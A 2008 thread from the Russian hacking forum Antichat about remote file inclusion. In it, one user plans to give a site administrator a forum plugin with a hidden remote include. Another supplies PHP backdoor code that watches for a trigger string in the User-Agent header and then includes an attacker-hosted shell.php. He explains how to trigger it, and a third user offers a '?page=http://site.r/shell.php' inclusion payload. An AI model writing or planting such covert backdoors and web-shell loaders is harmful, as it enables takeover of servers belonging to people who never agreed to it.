ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.03.2008, 11:12
|
|
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771
Репутация:
1916
|
|
Сообщение от Scipio
у тебя engtype, а надо enctype
аааа...блин...опечатался и сидел думал чё за хня.
Скип и Воланд спасибо 
пойду убью себя ап стену =/
|
|
|
30.03.2008, 11:32
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
ne короче такая тема нашел на сайте инклуд. инклудит страницу с другого сайта например страница php открывается как php а когда инклудишь txt открывается как txt что нить можно сделать с такой иньекцией
|
|
|
|
30.03.2008, 11:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от QZAR-X
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд.
Так тебе надо скрипт протроянить? вот:
$k=$_SERVER["USER_AGENT"];
это где нить незаметно так
if (strpos($k,"f35761"){ $path=explode(":",$k); include($path[1]);}
а уж юзер агент на такой: f35761:/path/to/shell.php
сменить каждый может, и шелл спрятать далеко на сервере или даже на удаленном сервере
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 11:55
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
Сообщение от Scipio
Так тебе надо скрипт протроянить? вот:
то что ты мне дал как вызывается? 
|
|
|
|
30.03.2008, 12:00
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
есть у тебя допустим скрипт:
PHP код:
<?php
....
$k=$_SERVER["USER_AGENT"];
....
if (strpos($k,"f35761"){ $path=explode("^",$k); include($path[1]);}
....
?>
ты меняешь у себя юзер агент (имя браузера) на например f35761^http://site/shell.php
и вызываешь этот скрипт, он проинклюдит http://site/shell.php
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 12:02
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
у меня ошибку во 2-ой строке вываливает
Parse error: syntax error, unexpected '{'
|
|
|
|
30.03.2008, 12:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
после if (strpos($k,"f35761") скобку ) поставь, я почемуто пропустил
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 12:14
|
|
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160
Репутация:
457
|
|
Сообщение от QZAR-X
то что ты мне дал как вызывается? читай внимательнее, это он не тебе писал.
В твоем случае нужно залить на любой другой хост пхп шелл, а потом уже его подключаешь - ?page=http://site.r/shell.php
|
|
|
|
30.03.2008, 12:19
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
Сообщение от lsass.exe
читай внимательнее, это он не тебе писал.
В твоем случае нужно залить на любой другой хост пхп шелл, а потом уже его подключаешь - ?page=http://site.r/shell.php
ни чего все равно не получится он покажет как php shell и не подгрузится
|
|
|
|
30.03.2008, 12:24
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
Мне этот инклудинг уже не нужен, т.к. удаленный инклуд запрещен на сервере.
Вот если кто-нибудь напишет маленький скриптик для загрузки на сервер файла, который вызывается script.php?fileupload=shell.php и файл shell.php загрузится в тек. дир.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
